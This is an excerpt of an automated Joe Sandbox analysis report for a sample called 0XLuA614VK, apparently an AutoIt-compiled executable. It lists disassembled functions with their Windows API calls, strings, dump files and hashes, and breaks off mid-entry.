                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharLower
                                                      • String ID: cdecl$none$stdcall$winapi
                                                      • API String ID: 707087890-567219261
                                                      • Opcode ID: 9b41d3f88887882cf95159076ef5522b4564e26453589506a6da5330a73c4f48
                                                      • Instruction ID: 599afd69b3939c11603cb9ec09a0c52b54e32260cf0c47357e84fd764971bdce
                                                      • Opcode Fuzzy Hash: 9b41d3f88887882cf95159076ef5522b4564e26453589506a6da5330a73c4f48
                                                      • Instruction Fuzzy Hash: 5E51C6B1E00116DBCF14DFA8C8805BEB7A5BF653A4B204229E416E72C0DFB4DD42E790
                                                      Function 00FA372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32 ref: 00FA3774
                                                      • CoUninitialize.OLE32 ref: 00FA377F
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00FBFB78,?), ref: 00FA37D9
                                                      • IIDFromString.OLE32(?,?), ref: 00FA384C
                                                      • VariantInit.OLEAUT32(?), ref: 00FA38E4
                                                      • VariantClear.OLEAUT32(?), ref: 00FA3936
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 636576611-1287834457
                                                      • Opcode ID: 72de23585fb8b896c0c7c7b1d905b5abaef35dcab86ef4095a1aecfa50ecb518
                                                      • Instruction ID: c53584b666714d3aa27d48f7138aa1befe512010d296644f81a66f519610a3ca
                                                      • Opcode Fuzzy Hash: 72de23585fb8b896c0c7c7b1d905b5abaef35dcab86ef4095a1aecfa50ecb518
                                                      • Instruction Fuzzy Hash: 0861B1B1608311AFD310DF54D889F6BB7E4EF4A710F100919F5859B291C774EE48EB92
                                                      Function 00F93388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00F933CF
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F933F0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: LoadString$_wcslen
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 4099089115-3080491070
                                                      • Opcode ID: a35217d127e7803d3791df0f3c87c3e1169d6f92f332d02731a785a8c525b0f5
                                                      • Instruction ID: c5f46c8592cc928f182e0d7d45ba47ee3a0ee96e2dacf26cd3b611415a9c3f13
                                                      • Opcode Fuzzy Hash: a35217d127e7803d3791df0f3c87c3e1169d6f92f332d02731a785a8c525b0f5
                                                      • Instruction Fuzzy Hash: C151AE72C0021AAADF15EBA0DD42EEEB778AF18740F144065F105B2092EB796F58FF61
                                                      Function 00F8B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                      • API String ID: 1256254125-769500911
                                                      • Opcode ID: 30e007b80d96b974719b72072d42ee73389902f4e1c37940f2d5b8ac3d0fdd96
                                                      • Instruction ID: b481dc34736d062de1fb29a48ac03170bb063e211b394eb6780545890ac4b050
                                                      • Opcode Fuzzy Hash: 30e007b80d96b974719b72072d42ee73389902f4e1c37940f2d5b8ac3d0fdd96
                                                      • Instruction Fuzzy Hash: 3541A532E0112B9BCB207F7D8C905FE7BA5AF607A4B254169E825D7284FB35CD81E790
                                                      Function 00F95393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00F953A0
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F95416
                                                      • GetLastError.KERNEL32 ref: 00F95420
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00F954A7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: 14562f10f5504160846e2a7e3dbae6661f2f11f884351e291f1a2adcddbae10c
                                                      • Instruction ID: 4ffc134fd728f076bac67b9a292631a28347b636e12acd0d894fa05b31f82e31
                                                      • Opcode Fuzzy Hash: 14562f10f5504160846e2a7e3dbae6661f2f11f884351e291f1a2adcddbae10c
                                                      • Instruction Fuzzy Hash: B431F435E002089FEB52DF6CC898BAABBB4FF44715F148065E405DB292D771DD82EB90
                                                      Function 00FB3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateMenu.USER32 ref: 00FB3C79
                                                      • SetMenu.USER32(?,00000000), ref: 00FB3C88
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FB3D10
                                                      • IsMenu.USER32(?), ref: 00FB3D24
                                                      • CreatePopupMenu.USER32 ref: 00FB3D2E
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FB3D5B
                                                      • DrawMenuBar.USER32 ref: 00FB3D63
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                      • String ID: 0$F
                                                      • API String ID: 161812096-3044882817
                                                      • Opcode ID: c194fa0c46166df4fb4b9f6b178221b4f4a7128c03bbbc3d86aef8e631c063c4
                                                      • Instruction ID: d592fee756b10156e1999e139b3ec9dbf4b209afe95846adcffccbb0650f4ab9
                                                      • Opcode Fuzzy Hash: c194fa0c46166df4fb4b9f6b178221b4f4a7128c03bbbc3d86aef8e631c063c4
                                                      • Instruction Fuzzy Hash: 4C415A79A01209EFDB24CFA5D884AEA7BB5FF49350F140129F946A7360D770AA10EF94
                                                      Function 00FB3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00FB3A9D
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00FB3AA0
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FB3AC7
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FB3AEA
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00FB3B62
                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00FB3BAC
                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00FB3BC7
                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00FB3BE2
                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00FB3BF6
                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00FB3C13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow
                                                      • String ID:
                                                      • API String ID: 312131281-0
                                                      • Opcode ID: e1fd5ef2057a3b0a4c38f3293fe007921df79a3ea8f6f7bce4fd5497f39c7464
                                                      • Instruction ID: 48ae1aef90223e0fe58e48d792ba94d06e9275f3e0035011148d3aed35a749fe
                                                      • Opcode Fuzzy Hash: e1fd5ef2057a3b0a4c38f3293fe007921df79a3ea8f6f7bce4fd5497f39c7464
                                                      • Instruction Fuzzy Hash: 60616975940248AFDB20DFA8CC81EEE77F8AF49710F104199FA15A72A1C7B4AA45EF50
                                                      Function 00F8B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F8B151
                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F8A1E1,?,00000001), ref: 00F8B165
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00F8B16C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F8A1E1,?,00000001), ref: 00F8B17B
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F8B18D
                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00F8A1E1,?,00000001), ref: 00F8B1A6
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F8A1E1,?,00000001), ref: 00F8B1B8
                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F8A1E1,?,00000001), ref: 00F8B1FD
                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00F8A1E1,?,00000001), ref: 00F8B212
                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00F8A1E1,?,00000001), ref: 00F8B21D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: 77ad92bbbf860dc443d321d968df6c700c6fb9eff2c1e826ab42d039cefd0354
                                                      • Instruction ID: a8d63c6712f22a474f9cbfdd65b7afce32af1adad0eca80ec14504c1eeafe537
                                                      • Opcode Fuzzy Hash: 77ad92bbbf860dc443d321d968df6c700c6fb9eff2c1e826ab42d039cefd0354
                                                      • Instruction Fuzzy Hash: 043191B1900208BFDB11AF24DC98FBE7BADBF51325F104116FA05D6290DBB4AA40EF64
                                                      Function 00F52C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00F52C94
                                                        • Part of subcall function 00F529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000), ref: 00F529DE
                                                        • Part of subcall function 00F529C8: GetLastError.KERNEL32(00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000,00000000), ref: 00F529F0
                                                      • _free.LIBCMT ref: 00F52CA0
                                                      • _free.LIBCMT ref: 00F52CAB
                                                      • _free.LIBCMT ref: 00F52CB6
                                                      • _free.LIBCMT ref: 00F52CC1
                                                      • _free.LIBCMT ref: 00F52CCC
                                                      • _free.LIBCMT ref: 00F52CD7
                                                      • _free.LIBCMT ref: 00F52CE2
                                                      • _free.LIBCMT ref: 00F52CED
                                                      • _free.LIBCMT ref: 00F52CFB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: c48dd832a6615128033a47a5950403bb1d2606231b4ec3576b3eba3d8884ffce
                                                      • Instruction ID: af237a842eb8f141af3e89b51e8281628fedb8088428f607338e60bc00e414e5
                                                      • Opcode Fuzzy Hash: c48dd832a6615128033a47a5950403bb1d2606231b4ec3576b3eba3d8884ffce
                                                      • Instruction Fuzzy Hash: A311B476100108AFCB42EF58DC42CDD3BB5BF06351F4146A4FA486B322D635EA54BB90
                                                      Function 00F21410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F21459
                                                      • OleUninitialize.OLE32(?,00000000), ref: 00F214F8
                                                      • UnregisterHotKey.USER32(?), ref: 00F216DD
                                                      • DestroyWindow.USER32(?), ref: 00F624B9
                                                      • FreeLibrary.KERNEL32(?), ref: 00F6251E
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F6254B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: 652e770ca455ff30a0712d2820969d86d217a2d4828bacde09c07de93573427f
                                                      • Instruction ID: b01f624b24f446ebe9f5e66b3c61b6ec6af5e6bfc7d63111b173ff6d47c689c1
                                                      • Opcode Fuzzy Hash: 652e770ca455ff30a0712d2820969d86d217a2d4828bacde09c07de93573427f
                                                      • Instruction Fuzzy Hash: CFD1B231B01222CFDB29EF15D899B69F7A0BF15710F1442ADE44A6B252CB31EC12EF95
                                                      Function 00F25BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00F25C7A
                                                        • Part of subcall function 00F25D0A: GetClientRect.USER32(?,?), ref: 00F25D30
                                                        • Part of subcall function 00F25D0A: GetWindowRect.USER32(?,?), ref: 00F25D71
                                                        • Part of subcall function 00F25D0A: ScreenToClient.USER32(?,?), ref: 00F25D99
                                                      • GetDC.USER32 ref: 00F646F5
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F64708
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00F64716
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00F6472B
                                                      • ReleaseDC.USER32(?,00000000), ref: 00F64733
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F647C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      • Opcode ID: 6c2d766748cdce930a4c9dd0e5c0e01aed0d604324b797eb41d9e6d9efe9846a
                                                      • Instruction ID: 04e094721d3a230ca996ba8609f3e1025d3cc94b91c7d8cd3afedd0859f4dd96
                                                      • Opcode Fuzzy Hash: 6c2d766748cdce930a4c9dd0e5c0e01aed0d604324b797eb41d9e6d9efe9846a
                                                      • Instruction Fuzzy Hash: 3371FF31800209DFCF21AF64C984AFA7BB6FF4A364F144269ED555A2A6D335A841FF60
                                                      Function 00F9359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00F935E4
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • LoadStringW.USER32(00FF2390,?,00000FFF,?), ref: 00F9360A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: LoadString$_wcslen
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 4099089115-2391861430
                                                      • Opcode ID: 3030bfbf5fce14303644b1f23ed3ec7e0a6cf2d22743d42fe1a37a739ac5d10b
                                                      • Instruction ID: 61529080c406f3c37775a4e16dac2b12a9264a1832b582e7e161a1211c9b267a
                                                      • Opcode Fuzzy Hash: 3030bfbf5fce14303644b1f23ed3ec7e0a6cf2d22743d42fe1a37a739ac5d10b
                                                      • Instruction Fuzzy Hash: 23518F72C0421AAADF14EBE0DC42EEEBB78AF14300F144125F105B21A1DB795B98FFA1
                                                      Function 00FB8B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F39BB2
                                                        • Part of subcall function 00F3912D: GetCursorPos.USER32(?), ref: 00F39141
                                                        • Part of subcall function 00F3912D: ScreenToClient.USER32(00000000,?), ref: 00F3915E
                                                        • Part of subcall function 00F3912D: GetAsyncKeyState.USER32(00000001), ref: 00F39183
                                                        • Part of subcall function 00F3912D: GetAsyncKeyState.USER32(00000002), ref: 00F3919D
                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00FB8B6B
                                                      • ImageList_EndDrag.COMCTL32 ref: 00FB8B71
                                                      • ReleaseCapture.USER32 ref: 00FB8B77
                                                      • SetWindowTextW.USER32(?,00000000), ref: 00FB8C12
                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00FB8C25
                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00FB8CFF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                      • API String ID: 1924731296-2107944366
                                                      • Opcode ID: 459fd3873083b031117dd295081fec04b449ac2a93d4b44dccd4234a8aeb6a88
                                                      • Instruction ID: 597f2a21089d4e1a1bdd3d9a8cdbe11b627d3316e17490eb8ae4bf5590157cf7
                                                      • Opcode Fuzzy Hash: 459fd3873083b031117dd295081fec04b449ac2a93d4b44dccd4234a8aeb6a88
                                                      • Instruction Fuzzy Hash: D0519EB1504304AFD710EF11DC95FAA77E8FB88750F00062DF955A72A1CBB5A904EFA2
                                                      Function 00F9C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F9C272
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F9C29A
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F9C2CA
                                                      • GetLastError.KERNEL32 ref: 00F9C322
                                                      • SetEvent.KERNEL32(?), ref: 00F9C336
                                                      • InternetCloseHandle.WININET(00000000), ref: 00F9C341
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 3113390036-3916222277
                                                      • Opcode ID: 474e4cba0b8c8ad8af19b3f37a6a0e2229beceaeaaed10d791e5f33088d7250f
